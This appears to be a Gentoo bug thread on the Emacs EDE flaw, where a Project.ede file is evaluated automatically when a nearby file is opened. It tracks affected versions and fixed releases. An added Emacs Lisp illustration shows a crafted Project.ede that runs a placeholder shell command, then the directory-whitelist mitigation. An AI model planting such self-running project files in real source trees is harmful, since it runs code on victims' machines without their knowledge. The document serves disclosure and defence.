+++ This bug was initially created as a clone of Bug #398227 +++
"Hiroshi Oota has found a security flaw in EDE (part of CEDET), a development tool included in Emacs. EDE can store various information about a project, such as how to build the project, in a file named Project.ede in the project directory tree. When the minor mode `global-ede-mode' is enabled, visiting a file causes Emacs to look for Project.ede in the file's directory or one of its parent directories. If Project.ede is present, Emacs automatically reads and evaluates the first Lisp expression in it.
This design exposes EDE users to the danger of loading malicious code from one file (Project.ede), simply by visiting another file in the same directory tree."
This affects app-editors/emacs-23.2* and -23.3* (CEDET was added in Emacs 23.2).
Upstream commit is here:
CCing arch teams, please stabilise app-editors/emacs-23.3-r4.
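As an added illustration, not part of this bug report, the Emacs advisory or the Gentoo ebuilds, here is what the attack and the mitigation look like in Emacs Lisp. The project name, the `/tmp/pwned` payload and the directory paths are made up; the loader behaviour is the one the advisory describes, and `ede-project-directories` / `ede-directory-safe-p` are the controls EDE gained in the fixed releases (Emacs 23.4, Gentoo 23.3-r4).

```elisp
;;; --- Malicious Project.ede (constructed example) --------------------------
;; EDE stores a project as a single Lisp form.  With `global-ede-mode' on,
;; visiting any file in or below the directory makes Emacs `read' this file
;; and evaluate that first form.  Because it is evaluated rather than merely
;; parsed, every slot value can be arbitrary code.  The attacker plants this
;; at the top of a source tree the victim will open:
;;
;;   (ede-proj-project "innocent"
;;     :name (progn
;;             ;; Runs with the victim's privileges as soon as Emacs visits
;;             ;; any file under this directory.  Placeholder payload.
;;             (shell-command "touch /tmp/pwned")
;;             "innocent")
;;     :file "Project.ede"
;;     :targets nil)
;;
;; The ede-proj-project wrapper only makes the file look like a normal
;; project definition; evaluation of the first form is what matters.

;;; --- Vulnerable setup (Emacs 23.2 .. 23.3 / Gentoo 23.2 .. 23.3-r3) --------
;; Enabling the minor mode is enough; nothing restricts which directories'
;; Project.ede files get evaluated.
(global-ede-mode 1)

;;; --- Hardened setup (Emacs >= 23.4 / Gentoo >= 23.3-r4) -------------------
;; The fixed EDE consults `ede-project-directories' before loading a
;; Project.ede.  Only directories listed here are loaded automatically;
;; the default nil whitelists nothing, and EDE asks before loading from an
;; unlisted directory.  Setting it to t restores the old behaviour: avoid.
(setq ede-project-directories
      '("/home/alice/src/myproject"   ; assumed: trees you created yourself
        "/home/alice/src/work"))
(global-ede-mode 1)

;;; --- Self-check of the whitelist -------------------------------------------
;; `ede-directory-safe-p' is the predicate the fixed loader applies; it
;; normalises the path and checks membership in `ede-project-directories'.
(defun my/ede-check (dir)
  "Return t if DIR's Project.ede would be auto-loaded, nil otherwise."
  (if (ede-directory-safe-p dir) t nil))

;; (my/ede-check "/home/alice/src/myproject/")  ; whitelisted
;; (my/ede-check "/tmp/untrusted-checkout/")    ; not whitelisted
```

On a vulnerable Emacs the only effective mitigation is to leave `global-ede-mode` off (it is off by default) until the stabilised 23.3-r4 is installed; on the fixed versions, keep `ede-project-directories` as an explicit list rather than t.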
According to Tim, is B
Hm, the summary isn't quite accurate. Please note that versions <23.2 don't support CEDET and are therefore not affected by the bug. Here's a complete list of vulnerable versions:
app-editors/emacs:
                          PVR <= 23.1-r3    unaffected
   23.2                <= PVR <= 23.3-r3    vulnerable
   23.4-r4             <= PVR               unaffected

app-editors/emacs-vcs (live ebuilds omitted):
                          PVR <= 23.0.96    unaffected
   23.1.90             <= PVR <= 23.2.94    vulnerable
   23.3.90             <= PVR <  24         unaffected
   24.0.50_pre20110116 <= PVR <= 24.0.92    vulnerable
   24.0.92-r1          <= PVR               unaffected
(In reply to comment #4)
> 23.4-r4 <= PVR unaffected
That should be 23.3-r4, of course. Sorry for the bugspam.
What a mess! So this is the target, right?:
(In reply to comment #7)
> What a mess! So this is the target, right?:
Right (see comment 1).
emacs-vcs has no stable versions.
x86 done. Thanks
Stable for HPPA.
Stable on all architectures. Vulnerable revision (emacs-23.2-r2) removed.
filed new request
Untrusted search path vulnerability in EDE in CEDET before 1.0.1, as used in
GNU Emacs before 23.4 and other products, allows local users to gain
privileges via a crafted Lisp expression in a Project.ede file in the
directory, or a parent directory, of an opened file.
This issue was resolved and addressed in
GLSA 201403-05 at http://security.gentoo.org/glsa/glsa-201403-05.xml
by GLSA coordinator Sergey Popov (pinkbyte).